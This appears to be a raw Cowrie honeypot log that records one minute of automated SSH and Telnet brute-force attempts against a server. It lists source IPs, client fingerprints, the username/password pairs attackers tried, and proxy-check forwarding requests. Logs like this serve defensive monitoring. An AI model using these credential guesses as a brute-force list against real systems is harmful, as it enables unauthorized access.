{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:39:40.284391Z","src_ip":"212.227.235.229","session":"e5aa40faa246"}
{"eventid":"cowrie.login.failed","username":"antonio","password":"123","message":"login attempt [antonio/123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:41.135988Z","src_ip":"212.227.235.229","session":"e5aa40faa246"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:42.351458Z","src_ip":"212.227.235.229","session":"e5aa40faa246"}
{"eventid":"cowrie.session.closed","duration":12.647867918014526,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.031544Z","src_ip":"212.227.235.229","session":"7dfa7ef263c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55664,"dst_ip":"1.2.3.4","dst_port":22,"session":"84daae10fe9b","protocol":"ssh","message":"New connection: 212.227.125.160:55664 (1.2.3.4:22) [session: 84daae10fe9b]","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.247713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.737555Z","src_ip":"212.227.125.160","session":"84daae10fe9b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.738271Z","src_ip":"212.227.125.160","session":"84daae10fe9b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35737,"dst_ip":"1.2.3.4","dst_port":22,"session":"def0106480c7","protocol":"ssh","message":"New connection: 77.83.207.83:35737 (1.2.3.4:22) [session: def0106480c7]","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.927804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.928822Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T06:39:48.979292Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.231369Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32366,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32366","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.282622Z","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.333225Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":22694,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22694","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.476809Z","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.527361Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3148,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3148","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.669009Z","session":"def0106480c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.719460Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:49.770725Z","src_ip":"77.83.207.83","session":"def0106480c7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password1","message":"login attempt [ubuntu/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:50.285155Z","src_ip":"212.227.125.160","session":"84daae10fe9b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:39:50.482951Z","src_ip":"212.227.125.160","session":"e9a594c68634"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:39:50.485490Z","src_ip":"212.227.125.160","session":"e9a594c68634"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:51.676889Z","src_ip":"212.227.125.160","session":"84daae10fe9b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:16.977674Z","src_ip":"212.227.125.160","session":"e9a594c68634"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53200,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c39d72a50da","protocol":"ssh","message":"New connection: 212.227.235.229:53200 (1.2.3.4:22) [session: 1c39d72a50da]","sensor":"my-vps","timestamp":"2025-08-31T06:40:20.486500Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43974,"dst_ip":"1.2.3.4","dst_port":22,"session":"49135ad2dc24","protocol":"ssh","message":"New connection: 212.227.235.229:43974 (1.2.3.4:22) [session: 49135ad2dc24]","sensor":"my-vps","timestamp":"2025-08-31T06:40:26.559467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:40:27.330832Z","src_ip":"212.227.235.229","session":"49135ad2dc24"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:40:27.331525Z","src_ip":"212.227.235.229","session":"49135ad2dc24"}
{"eventid":"cowrie.session.closed","duration":"54.6","message":"Connection lost after 54.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:28.999385Z","src_ip":"212.227.125.160","session":"e9a594c68634"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":17804,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ea109bea258","protocol":"ssh","message":"New connection: 80.94.95.112:17804 (1.2.3.4:22) [session: 9ea109bea258]","sensor":"my-vps","timestamp":"2025-08-31T06:40:30.379904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:40:31.141860Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:40:31.171340Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.login.failed","username":"admin","password":"volkodav","message":"login attempt [admin/volkodav] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:31.382691Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vishnu","message":"login attempt [admin/vishnu] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:32.415380Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"admin123","message":"login attempt [ubuntu/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:32.948698Z","src_ip":"212.227.235.229","session":"49135ad2dc24"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vicki","message":"login attempt [admin/vicki] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:33.447765Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vfnbkmlf","message":"login attempt [admin/vfnbkmlf] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:34.480006Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:34.663175Z","src_ip":"212.227.235.229","session":"49135ad2dc24"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:40:34.912031Z","src_ip":"212.227.235.229","session":"1c39d72a50da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:40:34.913528Z","src_ip":"212.227.235.229","session":"1c39d72a50da"}
{"eventid":"cowrie.login.failed","username":"admin","password":"veteran","message":"login attempt [admin/veteran] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:35.512567Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:36.545168Z","src_ip":"80.94.95.112","session":"9ea109bea258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57038,"dst_ip":"1.2.3.4","dst_port":23,"session":"df6ff6f66642","protocol":"telnet","message":"New connection: 212.227.235.229:57038 (1.2.3.4:23) [session: df6ff6f66642]","sensor":"my-vps","timestamp":"2025-08-31T06:40:44.622868Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:40:44.811381Z","src_ip":"212.227.235.229","session":"df6ff6f66642"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:40:44.827294Z","src_ip":"212.227.235.229","session":"df6ff6f66642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33736,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8c4e5aafaf6","protocol":"ssh","message":"New connection: 212.227.125.160:33736 (1.2.3.4:22) [session: f8c4e5aafaf6]","sensor":"my-vps","timestamp":"2025-08-31T06:40:47.735124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:40:48.201206Z","src_ip":"212.227.125.160","session":"f8c4e5aafaf6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:40:48.202323Z","src_ip":"212.227.125.160","session":"f8c4e5aafaf6"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"admin123","message":"login attempt [ubuntu/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:40:50.341413Z","src_ip":"212.227.125.160","session":"f8c4e5aafaf6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:40:51.895781Z","src_ip":"212.227.125.160","session":"f8c4e5aafaf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56017,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b456e68a60","protocol":"ssh","message":"New connection: 212.227.235.229:56017 (1.2.3.4:22) [session: 65b456e68a60]","sensor":"my-vps","timestamp":"2025-08-31T06:40:55.033659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:40:55.035897Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:40:55.245206Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@1234567890","message":"login attempt [root/Aa@1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:40:56.088554Z","src_ip":"212.227.235.229","session":"65b456e68a60"}
